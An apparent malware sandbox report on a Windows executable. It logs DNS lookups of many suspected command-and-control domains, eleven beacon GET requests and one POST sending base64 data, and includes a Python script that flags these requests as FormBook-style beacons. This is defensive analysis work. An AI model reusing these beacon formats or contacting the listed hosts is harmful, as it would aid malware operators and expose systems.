Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1 (14 identical entries in the report)
                Source: C:\Users\user\Desktop\PO AT-5228.exeCode function: 0_2_00BB4EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00BB4EB5
                Source: global traffic | HTTP traffic detected:
                    GET /fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.college-help.info
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.binacamasala.com
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /xprp/?rP=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.marketplacer.top
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.energyparks.net
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.yvrkp.top
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.flikka.site
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.ladylawher.shop
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.primeproperty.property
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.kghjkx.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= HTTP/1.1
                    Host: www.iuyi542.xyz
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | HTTP traffic detected:
                    GET /1i1f/?rP=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                    Host: www.neg21.top
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Connection: close
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                Source: global traffic | DNS traffic detected: DNS query: www.jllllbx.top
                Source: global traffic | DNS traffic detected: DNS query: www.college-help.info
                Source: global traffic | DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
                Source: global traffic | DNS traffic detected: DNS query: www.binacamasala.com
                Source: global traffic | DNS traffic detected: DNS query: www.marketplacer.top
                Source: global traffic | DNS traffic detected: DNS query: www.energyparks.net
                Source: global traffic | DNS traffic detected: DNS query: www.yvrkp.top
                Source: global traffic | DNS traffic detected: DNS query: www.flikka.site
                Source: global traffic | DNS traffic detected: DNS query: www.ladylawher.shop
                Source: global traffic | DNS traffic detected: DNS query: www.primeproperty.property
                Source: global traffic | DNS traffic detected: DNS query: www.kghjkx.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.iuyi542.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.neg21.top
                Source: global traffic | DNS traffic detected: DNS query: www.digitaladpro.shop
                Source: unknown | HTTP traffic detected:
                    POST /usv6/ HTTP/1.1
                    Host: www.binacamasala.com
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.5
                    Accept-Encoding: gzip, deflate, br
                    Origin: http://www.binacamasala.com
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: no-cache
                    Connection: close
                    Content-Length: 199
                    Referer: http://www.binacamasala.com/usv6/
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                    Data Raw: 72 50 3d 65 69 72 75 41 33 31 33 64 63 77 47 31 5a 48 55 42 32 2b 36 78 37 6d 4e 42 34 35 36 69 54 76 53 4a 78 78 35 76 65 75 58 66 77 38 59 4a 46 2f 43 32 54 6f 78 30 4d 37 2f 67 6e 37 48 4f 2b 79 71 57 43 78 53 37 47 44 36 6d 37 47 79 4f 68 42 36 33 73 68 7a 74 37 63 39 37 33 70 6f 6f 53 71 6b 72 67 43 37 52 62 73 62 78 6a 63 4f 33 6b 68 75 34 65 4b 56 75 56 4b 5a 6f 79 65 34 6c 2f 4a 6f 52 30 51 6d 73 74 36 56 66 2f 48 66 6f 56 72 61 56 66 43 6d 58 66 66 74 39 65 42 64 56 44 6f 4e 4c 48 4e 2b 59 68 69 38 72 51 59 7a 33 5a 39 44 73 5a 43 4c 39 76 63 49 69 42 65 52 7a 4c 4b 57 48 41 3d 3d
                    Data Ascii: rP=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLHN+Yhi8rQYz3Z9DsZCL9vcIiBeRzLKWHA==
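The eleven GET requests and the POST above share one shape: a single four-character directory, a long base64 `rP` value, the same short `2p2h` value on every host (its position in the query is shuffled in the /cymd/ request), `Connection: close`, and an Android browser User-Agent emitted by a desktop process (C:\Users\user\Desktop\PO AT-5228.exe). The Python below is an added example, not Joe Sandbox code and not code from the sample: it scores each request on those traits and then groups the flagged hosts by the shared id, which turns eleven unrelated-looking domains into one rotating C2 list. The request data is copied from the entries above; the benign control request, the desktop User-Agent, the four-character directory length, the 64-character base64 minimum, the 10 to 20 character id length and the three-trait threshold are this example's own assumptions.

```python
"""Flag FormBook-style HTTP beacons in Joe Sandbox "HTTP traffic detected" entries.

Added example for this report (not Joe Sandbox code). Request data is copied from
the report; the benign request, DESKTOP_UA and all thresholds are assumptions.
"""
import re
from collections import defaultdict

# User-Agent every request in the report carries (copied from the report).
ANDROID_UA = ("Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36")
# Constructed desktop User-Agent for the benign control request.
DESKTOP_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0 Safari/537.36"

# (method, request-target, Host, User-Agent, form body or None); copied from the report.
REPORT_REQUESTS = [
    ("GET", "/fu91/?rP=HVzlbrdNsUKwRMyAkSaq9f4c/m6isv/WUf8DIHIYxdtxD6ajZVqGW4SkaKVstmHHiDHGL4Ocj6+1IS/NZZr1NwcNkcJHwAXjc6i3ixCnFRD7cmGoWCaelms=&2p2h=vzYT2lDhJTZ0Ql", "www.college-help.info", ANDROID_UA, None),
    ("GET", "/usv6/?rP=TgDODAIJaOl5jtT4JRfI9OPwBKlUmFbaFilQ+MjMe2d3S0GP4FMVsOvduy7NJ4+NeTwYvTqThdXRP3V3mN8pkp0x831zohGfqDiCdJRchCUQ1npuqurwuCk=&2p2h=vzYT2lDhJTZ0Ql", "www.binacamasala.com", ANDROID_UA, None),
    ("GET", "/xprp/?rP=VtQLa3osnF7akoTJd8K7MWrEHzl8DW0FSH4Ha68GLubc/osER9eyiC9/VfKiy/o0cRDnmrVyyY747d0hGVpIr6r2fBWTDvY7eHgrrdp64c4dmhIDxYLLQeM=&2p2h=vzYT2lDhJTZ0Ql", "www.marketplacer.top", ANDROID_UA, None),
    ("GET", "/k47i/?rP=9kxEYcPO0Qe31MjAFnEMVPHcjnW8clhJfOSVnSYcFCRu8P8I16bnpHX0uCpjJCIKhM8RXi76z74nz8CD3eQ5QOBn4QFToSxFkTdn7+Zz8rczuwwOORjeo18=&2p2h=vzYT2lDhJTZ0Ql", "www.energyparks.net", ANDROID_UA, None),
    ("GET", "/9jdk/?rP=WubzzLgyg7H8FuUk5n/moB8/gOqFZhsVZD6HlZkF1Lv4/cTJ30fLKlagebv44Go8+oe4d1owWbTtJNvV0eU1JmU5XMaUHO6aCszk2dDtn8pHKEGonxM30wY=&2p2h=vzYT2lDhJTZ0Ql", "www.yvrkp.top", ANDROID_UA, None),
    ("GET", "/brrb/?rP=Pyc5xCH2FNTrUJIJcyFngeQJg4SvOnlrloocc6vOBweawvT0T5Z/ogiftYZRDFuocKSPtlVGb/YM09jHyAcWaQwrV3rluoKHVSlnOVUNWjSt4yW6AKlEvfo=&2p2h=vzYT2lDhJTZ0Ql", "www.flikka.site", ANDROID_UA, None),
    ("GET", "/i4bc/?rP=P7cuULF9RNNpbZDPqOSIjiALg+sZAwaoAqjHQXQRXIOUhYGrthov5xR31GNCxCywGXd8BQaSBdu7etG1CrfHuWVBHlP07YMsKwlH7wrGl8lSs0vEOZdyfzQ=&2p2h=vzYT2lDhJTZ0Ql", "www.ladylawher.shop", ANDROID_UA, None),
    ("GET", "/c1ti/?rP=UWVJg+rBkYQ16c/k/c5G2tAQQlKC6rNVaa0x99kOYGF7jBYWQyWqu7Abjh8I3w9fm9z6F4PdgXfZGbhZEsJH8R4Ck+TUDnCQl4oBl/L9phTMmBOgy1HwiRs=&2p2h=vzYT2lDhJTZ0Ql", "www.primeproperty.property", ANDROID_UA, None),
    ("GET", "/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql", "www.kghjkx.xyz", ANDROID_UA, None),
    ("GET", "/cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ=", "www.iuyi542.xyz", ANDROID_UA, None),
    ("GET", "/1i1f/?rP=dQYajm//Sx1stwXHf3xlHA3S8l/u0vyC8xP2ywW2sRY4KNcSndLgw2rkEnULaIMwbbOqPpfkjMw6pD0cpqqLVjWWADBg9XXOC9f0UMcBOgWMQTbzF2Ef3i8=&2p2h=vzYT2lDhJTZ0Ql", "www.neg21.top", ANDROID_UA, None),
    ("POST", "/usv6/", "www.binacamasala.com", ANDROID_UA,
     "rP=eiruA313dcwG1ZHUB2+6x7mNB456iTvSJxx5veuXfw8YJF/C2Tox0M7/gn7HO+yqWCxS7GD6m7GyOhB63shzt7c973pooSqkrgC7RbsbxjcO3khu4eKVuVKZoye4l/JoR0Qmst6Vf/HfoVraVfCmXfft9eBdVDoNLHN+Yhi8rQYz3Z9DsZCL9vcIiBeRzLKWHA=="),
]
# Constructed control: an ordinary page load from a desktop browser.
BENIGN_REQUEST = ("GET", "/index.html?ref=news", "www.example.com", DESKTOP_UA, None)

_SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")       # every path in the report is one 4-char directory (assumed length)
_B64 = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")      # standard base64 alphabet, optional padding
_OPAQUE_ID = re.compile(r"^[A-Za-z0-9]{10,20}$")  # the 14-char "2p2h" value seen on every host (assumed range)


def parse_params(encoded):
    """Split a query string or x-www-form-urlencoded body into a dict.

    Deliberately avoids urllib.parse.parse_qsl: it turns '+' into a space and
    would corrupt the base64 values these requests carry.
    """
    params = {}
    for pair in filter(None, encoded.split("&")):
        key, _, value = pair.partition("=")
        params[key] = value
    return params


def is_base64_blob(value, min_len=64):
    """True for well-formed base64 of at least min_len characters."""
    return len(value) >= min_len and len(value) % 4 == 0 and bool(_B64.match(value))


def _params_of(request):
    method, target, _host, _ua, body = request
    # A POST carries its parameters in the body, a GET in the query string.
    return parse_params(body if method == "POST" and body else target.partition("?")[2])


def beacon_traits(request):
    """Names of the FormBook-like traits one request exhibits."""
    _method, target, _host, user_agent, _body = request
    params = _params_of(request)
    traits = []
    if _SHORT_DIR.match(target.partition("?")[0]):
        traits.append("short_random_directory")
    if any(is_base64_blob(v) for v in params.values()):
        traits.append("long_base64_parameter")
    if any(_OPAQUE_ID.match(v) for v in params.values()):
        traits.append("short_opaque_id")
    if "Android" in user_agent:
        # The sandbox process is a Windows desktop executable; a mobile UA from it is a signal on its own.
        traits.append("mobile_ua_from_windows_process")
    return traits


def find_beacons(requests, threshold=3):
    """Requests showing at least `threshold` traits, paired with those traits."""
    hits = []
    for request in requests:
        traits = beacon_traits(request)
        if len(traits) >= threshold:
            hits.append((request, traits))
    return hits


def campaign_id(request):
    """The short opaque id parameter, if the request has one."""
    for value in _params_of(request).values():
        if _OPAQUE_ID.match(value):
            return value
    return None


def cluster_by_id(hits):
    """Group flagged hosts by the id they share: one id on many hosts is one campaign rotating C2 domains."""
    clusters = defaultdict(set)
    for request, _traits in hits:
        cid = campaign_id(request)
        if cid:
            clusters[cid].add(request[2])
    return {cid: sorted(hosts) for cid, hosts in clusters.items()}


if __name__ == "__main__":
    hits = find_beacons(REPORT_REQUESTS)
    for request, traits in hits:
        print(request[0], request[2], ", ".join(traits))
    for cid, hosts in cluster_by_id(hits).items():
        print(f"id {cid} shared by {len(hosts)} hosts: {', '.join(hosts)}")
```

On a live proxy log, raise the threshold or require the id to recur across several hosts before alerting: a mobile User-Agent or a base64 query value is common on its own, and it is the combination plus the rotation through many freshly registered domains that is characteristic here. The POST is flagged on three traits only, because its id parameter is absent and the `rP` value travels in the body.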
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:26:44 GMT
                    Server: Apache
                    Last-Modified: Wed, 06 Nov 2024 18:10:13 GMT
                    ETag: "49d-626426de29b28"
                    Accept-Ranges: bytes
                    Content-Length: 1181
                    Content-Type: text/html
                    Connection: close
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 13 Nov 2024 08:27:14 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
                    Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 13 Nov 2024 08:27:16 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
